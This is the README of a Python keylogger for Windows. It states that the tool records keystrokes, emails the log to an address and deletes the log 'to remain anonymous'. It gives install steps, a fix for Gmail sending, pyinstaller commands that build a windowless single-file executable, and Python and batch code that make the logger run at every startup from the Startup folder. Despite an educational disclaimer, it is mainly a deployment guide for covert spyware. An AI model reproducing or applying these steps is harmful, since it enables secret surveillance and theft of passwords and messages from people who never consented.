This program is primarily used to research how keyloggers work.

Python_KeyLogger_Windows

A Keylogger written in Python 3.6 that takes in user input from the keyboard, stores the data in a log, and then sends it to an email address. The data log is destroyed after the email is sent to remain anonymous.

DISCLAIMER

This program is for educational/research purposes only. The author takes no responsibility and/or liability for how an individual chooses to use any of the source files provided. The author will not be liable for any losses and/or damages in connection to the use of the program and its provided files. By using CSL_KeyLogger_Windows and/or any of its files included, you understand that you are AGREEING TO USE THE PROGRAM AT YOUR OWN RISK. This program is ONLY intended for personal use on a personal pentesting lab, or with consent from an individual of a system being tested.

Windows installation of python modules:

Download pyWin32 and pyHook modules from here, these libraries are required: https://www.lfd.uci.edu/~gohlke/pythonlibs/

Troubleshooting:

-ensure that your python version matches the module you are installing, or you will get errors when installing the modules.
-If you get an error, try installing the alternate version of the same version of the module as your python version. An example is if you download pyHook-1.5.1-cp36-cp36m-win_amd64 and you get an error, then try pyHook-1.5.1-cp36-cp36m-win32.
-majority of the times an error occurs when installing modules is usually from either a mismatch of versions with the module and python, or pip is not up to date.
-to update pip python -m pip install --upgrade pip

Guide on how to install Python Modules on Windows:

Open up the windows Command prompt as admin:

change to d drive if you have pythons executable here (in my case its in the d drive): d:
change directory to the python exe: cd D:\YourPath\venv\Scripts
now we want to install the pyHook module from this directory with pip, (my path is the following, change the path to wherever you have stored the .whl module): py -3.6 -m pip install C:\Users\YourPath\pywin32-223-cp36-cp36m-win32.whl
now we want to install the pyWin32 module from this library with pip, (my path is the following, change the path to wherever you have stored the .whl module): py -3.6 -m pip install C:\Users\YourPath\pywin32-223-cp36-cp36m-win32.whl

Troubleshooting:

SMTPAuthenticationError when sending mail using gmail FIX:

When using googles mail server, the email that you are using will be blocked for any sign-in attempts with the python program unless better security standards are in place. Because of this we need to enable access to less secure apps to allow us to send emails to this gmail account with the python program.

Sign into the gmail account that you want to use with the python program, and press the Turn On toggle button: https://www.google.com/settings/security/lesssecureapps

Python IDLE issues, keylogger is not picking up keys FIX:

If you are dealing with this issue with the IDLE, then delete the contents in the .idlerc folder located within your user profile of your computer. To find the folder check your user profile name followed by %APPDATA% and look for a folder called.".idlerc". Delete everything in that folder, and you should be able to run the program through python IDLE.

Output:

Running the Program: Open IDLE, or PyCharm, or whatever text editor, or IDE that you prefer for python and run the program. The python program outputs the values it picks up from the key presses using the print statements. This is a good way to see how the keylogger works. If you want to hide the DOS shell window that appears when running the python program, change the file extension from ".py" to ".pyw".

Here is an example of the program running. This is the output after first going to notepad and typing some words, then going to google. This is to show how the program marks the windows/programs the target is currently on.

This is how the log file(s) store the logged keys:

This is the sent keys logged to the email specified:

Creating the Executable:

When creating the executable file you want to use the python module, pyinstaller. This allows the program to be ran anywhere. The first thing required is the pyinstaller module, so install it using pip:

pip install pyinstaller

Then type the following command on your windows command prompt to create the executable:

pyinstaller -w -F name_of_python_script.py

The -w removes the opening of prompt window, while -F ensures that the executable is a single file that includes everything, rather then a folder. Once that's done navigate to the dist folder within the folder of your newly created python script, and grab the exe file.

The file is now created.

Persistenly Run KeyLogger on Startup:

On Windows devices there is a startup folder that determines which applications will run on startup. This folder is where some exploiters will store their keyloggers, in some cases they will mask it as a another program. Essentially this is done by implementing a python function that creates a bat file that runs the 'start' command, followed by the file path to the keylogger to execute the program. Or a general bat file stored in the startup folder that contains the following script with the commands will work.

Here is the python function that can be included in the program which creates the bat file. (I have included the full program with log deletion and bat startup under "key_log_win_withBATCreation.pyw"):

import getpass as gp
usern = gp.getuser()
def bat_create_file(path_log=""):
bat_path = r'C:\Users%s\YourPath\Startup' % usern
with open(bat_path + '\' + "open.bat", "w+") as bat_file:
bat_file.write(r'start "" %s' % path_log)
bat_create_file(path_log)

Sometimes a separate bat file is used instead of having a built-in function:

REM Place in startup folder
start "" path_log/myProgram.exe
exit

sahmed1o/Python-KeyLogger-Windows